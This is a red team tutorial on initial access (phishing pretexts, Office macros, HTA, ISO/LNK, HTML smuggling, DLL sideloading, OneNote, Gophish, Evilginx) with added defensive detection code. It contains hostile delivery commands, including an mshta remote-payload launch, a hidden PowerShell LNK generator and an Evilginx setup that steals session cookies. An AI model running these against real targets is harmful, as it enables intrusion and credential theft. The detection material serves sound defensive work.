Red Team

Initial Access Techniques

Getting initial access is often the most challenging part of a red team engagement. Modern defenses require creative payload delivery and social engineering.

Phishing Pretexts

Information

Good pretexts create urgency, authority, or curiosity without being obviously malicious.

Effective Pretexts

  • IT security updates
  • Password expiration
  • Shared documents
  • Invoice/payment issues
  • Meeting invitations
  • HR policy updates

Poor Pretexts

  • Nigerian prince
  • Lottery winnings
  • Unrelated to business
  • Obvious urgency
  • Generic content
  • Grammar errors

Payload Delivery Methods

Office Macros

Warning

Macros are increasingly blocked by default in Office, but they remain effective in legacy environments.
```bash
# VBA Macro Concepts for Word/Excel
# Save as .doc, .xls (not .docx, .xlsx)

# AutoOpen() - Runs when document opens
# Creates shell command to download and execute payload
# Shell cmd, vbHide - Runs hidden

# Example AutoOpen structure:
# Dim cmd As String
# cmd = "powershell -nop -w hidden -c IEX(...)"
# Shell cmd, vbHide

# Alternative: WMI spawn (evades some detection)
# Document_Open() uses WMI to create process
# GetObject("winmgmts:Win32_Process")
# objWMI.Create "powershell ..."

# Modern alternatives to macros:
# - VBA Stomping (hide malicious code)
# - XLM macros (Excel 4.0)
# - Add-ins (.xll files)
# - Template injection
```

HTA Files

```html
<!-- HTA payload - mshta.exe executes HTML Applications -->
<html>
<head>
<HTA:APPLICATION ID="payload" WINDOWSTATE="minimize" SHOWINTASKBAR="no" />
</head>
<body>
<!-- VBScript runs shell command on load -->
<!-- Sub Window_onLoad creates shell, runs PowerShell, closes window -->
<!-- Example: objShell.Run "powershell -ep bypass -c IEX(...)" -->
</body>
</html>
```

```bash
# Delivery: send as .hta, or host it and launch it via an mshta URL
mshta http://server/payload.hta

# Alternative: use JavaScript in the HTA
# new ActiveXObject("WScript.Shell").Run("cmd /c calc")
```

ISO/IMG Containers

```bash
# ISO files mount as a virtual drive when opened on Windows 10/11
# Used to bypass Mark-of-the-Web (MOTW) on the files inside

# Create ISO structure:
# - payload.exe (renamed to look legitimate)
# - shortcut.lnk (pointing to payload)
# - decoy.pdf (legitimate document)

# Create ISO on Linux
mkisofs -J -o payload.iso ./iso_contents/

# LNK file target:
# cmd.exe /c start /b payload.exe

# Or use PowerShell in LNK:
# powershell -w hidden -c "Start-Process payload.exe"
```
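The defender-side counterpart to the Office macro, HTA and ISO/IMG sections above is attachment triage at the mail gateway or in the sandbox. The following is an added example and not code from the page: it checks the byte signatures from the public format specs (the OLE compound file header, the ShellLink CLSID, the ISO 9660 "CD001" and UDF "BEA01" volume descriptors, the vbaProject.bin part inside OOXML, the hta:application element) and the sample files are constructed stubs that reproduce only those bytes. The indicator names are this example's own. A caveat worth knowing when reading the ISO section: since Microsoft's November 2022 Windows updates, Mark-of-the-Web is propagated to files inside mounted ISO images, so the MOTW bypass applies to unpatched hosts.

```python
import io
import re
import zipfile

# Byte signatures taken from the public format specs (MS-CFB, MS-SHLLINK, ECMA-119, UDF).
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# ShellLink header: HeaderSize 0x4C followed by CLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
ISO_PVD_OFFSET = 0x8000                                   # sector 16: first volume descriptor
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")    # stream name inside the CFB directory


def triage(filename: str, data: bytes) -> list[str]:
    """Return the indicators found in one attachment; an empty list means nothing was flagged."""
    findings = []
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""

    if data.startswith(OLE_MAGIC):
        # Legacy binary Office (.doc/.xls/.ppt) is an OLE compound file; a VBA project
        # shows up as a "_VBA_PROJECT" stream whose name is stored as UTF-16LE.
        findings.append("ole-compound-file")
        if VBA_STREAM_MARKER in data:
            findings.append("vba-project-stream")
    elif data.startswith(b"PK\x03\x04"):
        # OOXML is a zip; the macro-enabled variants always carry a vbaProject.bin part.
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = [n.lower() for n in zf.namelist()]
            if any(n.endswith("vbaproject.bin") for n in names):
                findings.append("ooxml-vbaproject")
        except zipfile.BadZipFile:
            findings.append("corrupt-zip")

    if len(data) > ISO_PVD_OFFSET + 6:
        descriptor = data[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6]
        if descriptor == b"CD001":
            findings.append("iso9660-image")      # container used to wrap payload + LNK
        elif descriptor == b"BEA01":
            findings.append("udf-image")

    if data.startswith(LNK_MAGIC):
        findings.append("lnk-shortcut")

    if re.search(rb"<\s*hta:application", data, re.IGNORECASE):
        findings.append("hta-application")        # the element that makes mshta.exe run it

    if ext == "xll" and data.startswith(b"MZ"):
        findings.append("xll-addin-pe")           # an Excel add-in is a native DLL

    return findings


def _ooxml(with_macro: bool) -> bytes:
    """Build a minimal OOXML-like zip (constructed sample, not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 64)
    return buf.getvalue()


# Constructed samples: only the bytes the checks look at are realistic.
SAMPLES = {
    "report.doc": OLE_MAGIC + b"\x00" * 504 + VBA_STREAM_MARKER + b"\x00" * 64,
    "invoice.docm": _ooxml(with_macro=True),
    "benign.docx": _ooxml(with_macro=False),
    "update.iso": b"\x00" * ISO_PVD_OFFSET + b"\x01CD001\x01" + b"\x00" * 2048,
    "Document.lnk": LNK_MAGIC + b"\x00" * 60,
    "portal.hta": b"<html><head><HTA:APPLICATION ID='app' /></head></html>",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:14} {triage(name, blob) or 'clean'}")
```

The checks are deliberately content-based rather than extension-based, because renaming is the first thing a lure does; run the script as-is to see each constructed sample's findings, and feed real attachments through `triage()` to use it.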

HTML Smuggling

Tip

HTML smuggling bypasses email gateways by assembling payloads client-side using JavaScript.
```bash
# HTML Smuggling Concepts

# How it works:
# 1. Embed base64-encoded payload in JavaScript
# 2. JavaScript decodes and creates Blob
# 3. Triggers automatic download
# 4. Bypasses email scanning since payload isn't in clear text

# JavaScript approach (pseudocode):
# var payload = 'TVqQAAMAAAA...';  // Base64 encoded payload
# var bytes = atob(payload);        // Decode base64
# var blob = new Blob([bytes]);     // Create Blob object
# var a = document.createElement('a');
# a.href = URL.createObjectURL(blob);
# a.download = 'update.iso';
# a.click();                        // Trigger download

# Tools for HTML smuggling:
# - smuggler (GitHub)
# - Outflank's tooling
# - Custom templates

# Delivery vectors:
# - Phishing emails with HTML attachments
# - Compromised web pages
# - Fake download portals
```
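Because the payload never appears in clear text, detection of HTML smuggling has to look at the JavaScript chain itself. The scorer below is an added example, not code from the page or from any of the tools it names: it counts the pieces of the decode-Blob-download chain (plus a large base64 literal and a container-type download name) and flags an HTML body when most of them are present. The rule names and thresholds are this example's own, and both sample pages are constructed; the "payload" in the suspicious one is a repeated base64 fragment, not a real file.

```python
import re

# Each indicator is common on its own; together they form the decode -> Blob -> download
# chain that HTML smuggling depends on. The rule names are this example's own labels.
INDICATORS = [
    ("base64-decode",           re.compile(r"\batob\s*\(")),
    ("blob-construct",          re.compile(r"\bnew\s+Blob\s*\(")),
    ("object-url",              re.compile(r"URL\.createObjectURL\s*\(")),
    ("ie-save-blob",            re.compile(r"msSaveOrOpenBlob")),
    ("download-attr",           re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]")),
    ("synthetic-click",         re.compile(r"\.click\s*\(\s*\)")),
    ("large-b64-literal",       re.compile(r"['\"][A-Za-z0-9+/=]{2048,}['\"]")),
    ("container-download-name", re.compile(r"['\"][^'\"]*\.(?:iso|img|lnk|hta|exe|scr)['\"]", re.I)),
]


def smuggling_indicators(html: str) -> list[str]:
    """Names of the indicators present in an HTML attachment body, in rule order."""
    return [name for name, rx in INDICATORS if rx.search(html)]


def is_html_smuggling(html: str, threshold: int = 4) -> bool:
    """Flag when most of the chain is present; a lone atob() or click() is normal web code."""
    return len(smuggling_indicators(html)) >= threshold


# Constructed samples. The "payload" below is a repeated base64 fragment, not a real file.
SUSPICIOUS_HTML = """<html><body><script>
var payload = '""" + "TVqQAAMAAAAEAAAA" * 200 + """';
var bytes = atob(payload);
var blob = new Blob([bytes], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'update.iso';
a.click();
</script></body></html>"""

BENIGN_HTML = """<html><body><button id="go">Continue</button><script>
var cfg = JSON.parse(atob('eyJ0aGVtZSI6ImRhcmsifQ=='));
document.getElementById('go').click();
</script></body></html>"""

if __name__ == "__main__":
    for label, html in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(label, is_html_smuggling(html), smuggling_indicators(html))
```

Obfuscated variants (string-split function names, `Function("at"+"ob")`) will slip past a regex scorer, which is why this belongs in front of, not instead of, detonating HTML attachments in a browser sandbox and watching for a file download.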

DLL Sideloading

```bash
# Find sideload opportunities
# Legitimate signed EXE + malicious DLL in same directory

# Common sideload targets:
# - OneDrive.exe + version.dll
# - Teams.exe + various DLLs
# - Slack.exe + various DLLs

# Steps:
# 1. Find signed EXE that loads DLL from current directory
# 2. Create DLL with exported functions
# 3. Include malicious code in DllMain
# 4. Package EXE + DLL together

# Check for missing DLLs (ProcMon)
# Look for "NAME NOT FOUND" in DLL paths

# DLL proxy approach:
# Forward legitimate function calls to real DLL
# Execute malicious code during load
```
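On the detection side, the same layout (signed EXE plus a DLL next to it, outside a protected directory) is what to hunt for in image-load telemetry. The following is an added example, not code from the page: it scores Sysmon-style ImageLoad records (Event ID 7 fields Image, ImageLoaded, Signed, SignatureStatus) and alerts when a DLL beside the EXE in a user-writable directory is unsigned, or when a DLL that normally resolves from System32 is loaded from anywhere else. The records are constructed, and the SYSTEM_DLLS list is an assumed starting set built around the version.dll example above.

```python
import ntpath

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# DLLs a legitimate process resolves from System32. version.dll is the page's OneDrive
# example; the other names are further well-known entries (assumed list, extend as needed).
SYSTEM_DLLS = {"version.dll", "cryptbase.dll", "dbghelp.dll", "wtsapi32.dll"}


def sideload_indicators(event: dict) -> list[str]:
    """Indicators from one ImageLoad record (Image, ImageLoaded, Signed, SignatureStatus)."""
    exe_dir = ntpath.dirname(event["Image"].lower())
    dll_dir, dll_name = ntpath.split(event["ImageLoaded"].lower())
    reasons = []
    if dll_dir == exe_dir and not (dll_dir + "\\").startswith(TRUSTED_ROOTS):
        reasons.append("dll-beside-exe-in-writable-dir")      # the classic sideload layout
    if dll_name in SYSTEM_DLLS and not dll_dir.startswith("c:\\windows\\"):
        reasons.append("system-dll-resolved-outside-windows")
    if event.get("Signed", "false").lower() != "true":
        reasons.append("dll-unsigned")
    elif event.get("SignatureStatus", "Valid").lower() != "valid":
        reasons.append("dll-signature-invalid")
    return reasons


def sideload_alert(event: dict) -> list[str]:
    """Alert when a risky location coincides with an untrusted DLL, or a system DLL was relocated."""
    reasons = sideload_indicators(event)
    relocated = "system-dll-resolved-outside-windows" in reasons
    untrusted = "dll-unsigned" in reasons or "dll-signature-invalid" in reasons
    beside = "dll-beside-exe-in-writable-dir" in reasons
    return reasons if relocated or (beside and untrusted) else []


# Constructed ImageLoad records: a normal load, a sideload from a Downloads folder, and an
# Electron-style app that legitimately ships signed DLLs beside its EXE under AppData.
IMAGELOAD_EVENTS = [
    {"Image": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe",
     "ImageLoaded": "C:\\Windows\\System32\\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": "C:\\Users\\alice\\Downloads\\Invoice\\OneDrive.exe",
     "ImageLoaded": "C:\\Users\\alice\\Downloads\\Invoice\\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": "C:\\Users\\alice\\AppData\\Local\\slack\\app-4.36.140\\slack.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\slack\\app-4.36.140\\ffmpeg.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for ev in IMAGELOAD_EVENTS:
        print(ntpath.basename(ev["ImageLoaded"]), sideload_alert(ev) or "ok")
```

The third record shows why "DLL beside EXE in a writable directory" alone is too noisy to alert on: per-user installers put exactly that layout under AppData, so the signature state (or a relocated system DLL) is what tips the decision.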

OneNote Exploitation

```text
# OneNote allows embedding files
# Users can double-click to execute

# Attack flow:
# 1. Create .one file
# 2. Embed malicious file (HTA, BAT, EXE)
# 3. Cover with image saying "Click to view"
# 4. User clicks, confirms warning, executes

# OneNote sections (.one) structure:
# - Embedded objects stored in file
# - Can include any file type
# - Execution requires user click + confirmation

# Note: Microsoft has added more warnings
# But social engineering can still work
```
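Since the embedded objects are stored in the section file itself, a gateway can carve them out and type them without opening OneNote. The carver below is an added example, not code from the page: it follows the FileDataStoreObject layout from the MS-ONESTORE specification (a header GUID, an 8-byte length, 12 bytes of unused/reserved fields, the file data, then a footer GUID) and classifies each carved blob by content. The section file and its three embedded objects are constructed; the GUID values are the documented ones, written little-endian as they appear on disk.

```python
import re
import struct
import uuid

# GUIDs from MS-ONESTORE, stored little-endian on disk (uuid.bytes_le gives that layout).
ONE_SECTION_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le  # .one file header
FDSO_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le         # FileDataStoreObject start
FDSO_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le         # FileDataStoreObject end
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8   # guidHeader, cbLength, unused, reserved


def is_onenote_section(data: bytes) -> bool:
    return data.startswith(ONE_SECTION_MAGIC)


def extract_embedded(data: bytes) -> list[bytes]:
    """Carve every FileDataStoreObject payload out of a section file."""
    blobs, pos = [], data.find(FDSO_HEADER)
    while pos != -1:
        (length,) = struct.unpack_from("<Q", data, pos + 16)   # cbLength follows the GUID
        start = pos + FDSO_DATA_OFFSET
        blobs.append(data[start:start + length])
        pos = data.find(FDSO_HEADER, start + length)
    return blobs


def classify(blob: bytes) -> str:
    """Coarse type by content; the embedded object's display name is not what decides execution."""
    head = blob[:4096]
    if head.startswith(b"MZ"):
        return "pe-executable"
    if re.search(rb"<\s*hta:application", head, re.IGNORECASE):
        return "hta"
    if re.search(rb"@echo off|wscript\.shell|createobject\(|powershell|cmd(?:\.exe)?\s+/c", head, re.IGNORECASE):
        return "script"
    if head.startswith((b"\x89PNG", b"\xff\xd8\xff", b"%PDF")):
        return "document-or-image"
    return "unknown"


EXECUTABLE_TYPES = {"pe-executable", "hta", "script"}


def dangerous_embeds(data: bytes) -> list[str]:
    """Types of embedded objects that would run code if the user clicks through the warning."""
    return [t for t in (classify(b) for b in extract_embedded(data)) if t in EXECUTABLE_TYPES]


def _fdso(payload: bytes) -> bytes:
    """Wrap a payload in a FileDataStoreObject (used only to build the constructed sample)."""
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload + FDSO_FOOTER


# Constructed sample: a section header, filler, then three embedded objects.
SAMPLE_ONE = (
    ONE_SECTION_MAGIC + b"\x00" * 128
    + _fdso(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)                         # the "Click to view" cover image
    + _fdso(b"<html><head><HTA:APPLICATION ID='app'/></head></html>")    # embedded HTA
    + _fdso(b"@echo off\r\nstart /b notepad.exe\r\n")                     # embedded batch file
)

if __name__ == "__main__":
    print("section:", is_onenote_section(SAMPLE_ONE))
    print("embedded:", [classify(b) for b in extract_embedded(SAMPLE_ONE)])
    print("dangerous:", dangerous_embeds(SAMPLE_ONE))
```

A simple policy that follows from this is to quarantine any .one attachment for which `dangerous_embeds()` is non-empty, regardless of the cover image or file names shown in the note.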

LNK Files

```powershell
# LNK files can execute commands
# Often combined with ISO delivery

# PowerShell LNK generator
$obj = New-Object -ComObject WScript.Shell
$link = $obj.CreateShortcut("C:\temp\Document.lnk")
$link.WindowStyle = 7  # Minimized
$link.TargetPath = "C:\Windows\System32\cmd.exe"
$link.Arguments = "/c powershell -w hidden -ep bypass -c IEX(...)"
$link.IconLocation = "C:\Windows\System32\shell32.dll,1"  # Folder icon
$link.Save()

# Arguments to evade:
# /c start /b - Background execution
# powershell -w hidden - Hidden window
# -ep bypass - Execution policy bypass
```
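The command-line flags listed as evasions in the LNK, ISO and HTA sections above are exactly what process-creation telemetry keys on. The detector below is an added example and not code from the page: it runs a small rule set over Sysmon-style process-creation records (ParentImage, Image, CommandLine) and flags hidden-window PowerShell, execution-policy bypass, IEX, encoded commands, mshta launched with a URL or inline script, `start /b`, and any script host spawned directly by an Office or OneNote process. The records are constructed and the rule names are this example's own.

```python
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "onenote.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# (rule name, regex over the command line). The patterns mirror the flags quoted in the
# sections above: hidden window, execution-policy bypass, IEX, mshta with a URL, start /b.
CMDLINE_RULES = [
    ("powershell-hidden-window", re.compile(r"\bpowershell(?:\.exe)?\b.*?-w(?:in|indowstyle)?\s+h(?:idden)?\b", re.I | re.S)),
    ("powershell-ep-bypass",     re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I)),
    ("powershell-iex",           re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("powershell-encoded",       re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
    ("mshta-remote-url",         re.compile(r"\bmshta(?:\.exe)?\b.*?\b(?:https?:|\\\\)", re.I | re.S)),
    ("mshta-inline-script",      re.compile(r"\bmshta(?:\.exe)?\b.*?\b(?:vbscript|javascript):", re.I | re.S)),
    ("cmd-start-background",     re.compile(r"\bstart\s+/b\b", re.I)),
]


def process_indicators(event: dict) -> list[str]:
    """Rule names that fire for one process-creation record."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")   # macro, HTA and OneNote clicks all land here
    hits.extend(name for name, rx in CMDLINE_RULES if rx.search(cmd))
    return hits


# Constructed records: a macro-style spawn, the page's mshta URL launch, an LNK-style
# cmd /c start /b, and a benign scheduled backup script.
PROCESS_EVENTS = [
    {"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c powershell -nop -w hidden -ep bypass -c IEX($stage)"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta http://server/payload.hta"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c start /b payload.exe"},
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        print(ntpath.basename(ev["Image"]), process_indicators(ev) or "ok")
```

The parent/child rule is the highest-value one: WINWORD.EXE or ONENOTE.EXE starting cmd.exe, powershell.exe or mshta.exe has almost no legitimate occurrences in most environments, while the individual flags are better treated as severity modifiers than as alerts on their own.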

Phishing Frameworks

Gophish

```bash
# Install Gophish
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
./gophish

# Access admin panel: https://localhost:3333
# Default creds in terminal output

# Setup:
# 1. Configure sending profile (SMTP)
# 2. Create email template
# 3. Create landing page
# 4. Import users
# 5. Launch campaign
```

Evilginx

```bash
# Evilginx - Man-in-the-middle phishing
# Captures credentials AND session tokens (bypasses MFA)

# Install
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
make

# Run
./evilginx -p ./phishlets

# Configure
: config domain yourdomain.com
: config ip YOUR_IP
: phishlets hostname microsoft365 login.yourdomain.com
: phishlets enable microsoft365
: lures create microsoft365

# Generate phishing URL
: lures get-url 0

# Captured sessions include:
# - Username/password
# - Session cookies
# - MFA tokens
```
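Because a reverse-proxy kit relays the real login, the identity provider sees a completed, MFA-satisfied sign-in; what it cannot hide is that the resulting session is then presented from a different network and browser than the one that signed in. The following is an added example, not code from the page or from Evilginx: it groups identity-provider audit records by session, baselines the sign-in IP and user agent, and raises an alert when the same session is used from a new IP within a short window, rating it high when the user agent also changed. The records are constructed and use RFC 5737 documentation addresses. Phishing-resistant MFA (FIDO2/WebAuthn) is the preventive control here, since the assertion is bound to the origin the browser actually visited and cannot be relayed through the proxy.

```python
from datetime import datetime

# Constructed identity-provider audit records (RFC 5737 documentation addresses).
SIGNIN_EVENTS = [
    {"ts": "2024-03-01T09:00:00", "session": "S1", "user": "alice", "ip": "203.0.113.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122", "event": "signin"},
    {"ts": "2024-03-01T09:00:40", "session": "S1", "user": "alice", "ip": "203.0.113.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122", "event": "mail.read"},
    {"ts": "2024-03-01T09:03:10", "session": "S1", "user": "alice", "ip": "198.51.100.77",
     "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/123", "event": "mail.read"},
    {"ts": "2024-03-01T10:15:00", "session": "S2", "user": "bob", "ip": "192.0.2.25",
     "ua": "Mozilla/5.0 (Macintosh) Safari/17", "event": "signin"},
    {"ts": "2024-03-01T10:20:00", "session": "S2", "user": "bob", "ip": "192.0.2.25",
     "ua": "Mozilla/5.0 (Macintosh) Safari/17", "event": "files.list"},
]


def find_session_reuse(events, window_minutes=30):
    """Sessions whose token is presented from a new IP soon after sign-in.

    A changed user agent on top of the new IP is rated high: the cookie was replayed from a
    different browser. IP-only changes are rated low because NAT and mobile networks do that.
    """
    by_session = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_session.setdefault(e["session"], []).append(e)
    alerts = []
    for sid, evs in by_session.items():
        signin = next((e for e in evs if e["event"] == "signin"), evs[0])
        t0 = datetime.fromisoformat(signin["ts"])
        for e in evs:
            if e is signin or e["ip"] == signin["ip"]:
                continue
            minutes = (datetime.fromisoformat(e["ts"]) - t0).total_seconds() / 60
            if 0 <= minutes <= window_minutes:
                alerts.append({
                    "session": sid, "user": e["user"], "signin_ip": signin["ip"],
                    "new_ip": e["ip"], "minutes_after_signin": round(minutes, 1),
                    "severity": "high" if e["ua"] != signin["ua"] else "low",
                })
                break   # one alert per session is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_session_reuse(SIGNIN_EVENTS):
        print(alert)
```

In a real deployment the sign-in IP of a proxied login is the kit's own server, which is a second signal worth joining in: a sign-in from a hosting-provider range followed minutes later by use from a residential or corporate range is the typical shape of this attack. Revoking the session (not just resetting the password) is the response, since the stolen cookie stays valid until it is invalidated.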

External Service Exploitation

```text
# Exploit external services for initial access

# VPN vulnerabilities
# - Pulse Secure (CVE-2021-22893)
# - Fortinet (CVE-2022-40684)
# - Citrix (CVE-2023-3519)

# Exchange vulnerabilities
# - ProxyLogon (CVE-2021-26855)
# - ProxyShell (CVE-2021-34473)
# - ProxyNotShell (CVE-2022-41082)

# Web application vulnerabilities
# - Log4j (CVE-2021-44228)
# - Spring4Shell (CVE-2022-22965)

# Always check for:
# - Unpatched public-facing services
# - Default credentials
# - Known CVEs
```